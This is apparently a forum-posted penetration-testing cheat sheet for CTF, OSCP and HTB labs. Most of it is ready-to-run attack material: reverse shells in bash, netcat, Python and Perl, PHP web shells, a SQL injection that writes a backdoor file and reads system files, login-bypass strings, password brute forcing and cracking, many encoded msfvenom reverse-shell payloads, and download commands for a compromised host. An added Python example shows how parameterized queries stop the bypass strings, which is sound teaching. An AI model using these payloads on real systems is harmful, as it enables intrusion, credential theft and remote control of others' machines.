Hacker's Cheatsheet for CTF, OSCP, HTB

Enumeration
Enumeration is the most important thing you can do. When you find
yourself hitting a wall, 90% of the time it will be because you haven't
done enough enumeration.
Below are commands which are helpful while you are in the lab:
Nmap
Quick TCP Scan
Code:
nmap -sC -sV -vv -oA quick target
Quick UDP Scan
Code:
nmap -sU -sV -vv -oA quick_udp target
Full TCP Scan
Code:
nmap -sC -sV -p- -vv -oA full target
Port knock
Code:
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x target; done
Web Scanning
Gobuster quick directory busting
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

Gobuster search with file extension
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
Nikto web server scan
Code:
nikto -h target
Wordpress scan
Code:
wpscan -u target/wp/
Port Checking
Netcat banner grab
Code:
nc -v target port
Telnet banner grab
Code:
telnet target port
SMB
SMB Vulnerability Scan
Code:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse target
SMB Users & Shares Scan
Code:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse target
Enum4linux
Code:
enum4linux -a target
Null connect
Code:
rpcclient -U "" target
Connect to SMB share
Code:
smbclient //MOUNT/share
SNMP
SNMP enumeration
Code:
snmp-check target
Reverse Shells
Bash shell
Code:
bash -i >& /dev/tcp/target/4443 0>&1
Netcat Linux
Code:
nc -e /bin/sh target 4443
Netcat Windows
Code:
nc -e cmd.exe target 4443
Python
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("target",4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
Code:
perl -e 'use Socket;$i="target";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Remote Desktop
Remote Desktop for Windows with share and 85% screen
Code:
rdesktop -u username -p password -g 85% -r disk:share=/root/ target
PHP
PHP command injection from GET Request
Code:
<?php echo system($_GET["cmd"]);?>
#Alternative
Code:
<?php echo shell_exec($_GET["cmd"]);?>
Powershell
Non-interactive execute powershell file
Code:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
SSH Tunneling / Pivoting
sshuttle
sshuttle -vvr [email protected] 10.1.1.0/24
Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
SQL Injection
# sqlmap crawl
sqlmap -u http://target --crawl=1
# sqlmap dump database
sqlmap -u http://target --dbms=mysql --dump
# sqlmap shell
sqlmap -u http://target --dbms=mysql --os-shell
Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
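Why these bypass strings work, and what stops them, as an added example that is not part of the original post: a login check built by string formatting beside the same check with bound parameters, run against a constructed in-memory SQLite table. Only the `--` variants are exercised because SQLite does not treat `#` as a comment (that is MySQL syntax).

```python
import sqlite3

def make_db():
    """Constructed user table for the demonstration (plaintext passwords for brevity)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")
    return conn

def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting: the quote in the payload closes the
    literal, 'or 1=1' makes the WHERE clause true, and '--' comments out the rest."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Bound parameters keep the input as data; quotes and comment markers are inert."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

# The '--' bypass strings from the list above, exactly as written there.
BYPASSES = ["' or 1=1 LIMIT 1 --", "' or 1=1 LIMIT 1 -- -", "' or 1=1 --", "' or 1=1 -- -"]

def compare(payloads=BYPASSES):
    """For each payload, return (result of vulnerable check, result of parameterized check)."""
    conn = make_db()
    return {p: (login_vulnerable(conn, p, "wrong"),
                login_parameterized(conn, p, "wrong")) for p in payloads}

if __name__ == "__main__":
    for payload, (vuln, safe) in compare().items():
        print(repr(payload), "->", vuln, "|", safe)
```

The vulnerable function logs every payload in as the first user in the table without knowing any password; the parameterized one returns no match for all of them while still authenticating a correct username and password pair.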
Brute force
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db
$ john unshadow.db
# Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
# Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
# Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt
# Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
# Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://target
SSH user with password list
hydra -l user -P pass.txt -t 10 target ssh -s 22
FTP user with password list
medusa -h target -u user -P passwords.txt -M ftp
MSFVenom Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=target LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=target LPORT=4443 -f war -o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=target LPORT=4443 -f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=target LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=target LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Interactive Shell
Upgrading to a fully interactive TTY using Python
# Enter while in reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers
HTTP
The most common file transfer method.
# In Kali
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget target/file
# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://target/file.exe','C:\Users\user\Desktop\file.exe')"
FTP
This process can be tedious. A quick tip: name the file 'file' on your Kali
machine so that you don't have to rewrite the script for every filename; you
can then rename the file on Windows.
# In Kali
python -m pyftpdlib -p 21 -w
# In reverse shell
echo open target > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt
TFTP
Generic.
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i target GET nc.exe